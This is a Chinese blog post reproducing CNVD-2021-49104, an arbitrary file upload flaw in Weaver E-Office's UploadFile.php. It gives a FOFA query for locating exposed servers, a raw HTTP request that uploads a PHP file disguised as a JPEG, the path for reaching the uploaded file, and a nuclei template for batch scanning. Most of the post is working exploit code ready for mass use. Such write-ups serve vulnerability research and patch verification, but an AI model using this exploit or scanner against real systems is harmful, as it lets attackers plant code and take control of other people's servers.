泛微E-Office UploadFile.php任意文件上传漏洞 CNVD-2021-49104
漏洞描述
在/general/index/UploadFile.php中上传文件过滤不严格导致允许无限制地上传文件,攻击者可以通过该漏洞直接获取网站权限
漏洞复现
fofa语法:app="泛微-EOffice"
登录页面如下:
POC:
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close
Content-Type:multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
Content-Length: 192
--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg
<?php phpinfo();?>
--e64bdf16c554bbc109cecef6451c26a4--
再访问/images/logo/logo-eoffice.php
nuclei批量yaml文件
id: CNVD-2021-49104
info:
name: Pan Micro E-office File Uploads
author: pikpikcu
severity: critical
description: The Pan Wei Micro E-office version running allows arbitrary file uploads from a remote attacker.
reference:
- https://chowdera.com/2021/12/202112200602130067.html
- http://v10.e-office.cn
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
cvss-score: 9.9
cwe-id: CWE-434
remediation: Pan Wei has released an update to resolve this vulnerability.
tags: pan,micro,cnvd,cnvd2021,fileupload,intrusive
metadata:
max-request: 2
http:
- raw:
- |
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.php"
Content-Type: image/jpeg
<?php echo md5('CNVD-2021-49104');?>
--e64bdf16c554bbc109cecef6451c26a4--
- |
GET /images/logo/logo-eoffice.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "94d01a2324ce38a2e29a629c54190f67"
- type: status
status:
- 200
分类:
漏洞复现 / 泛微OA
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探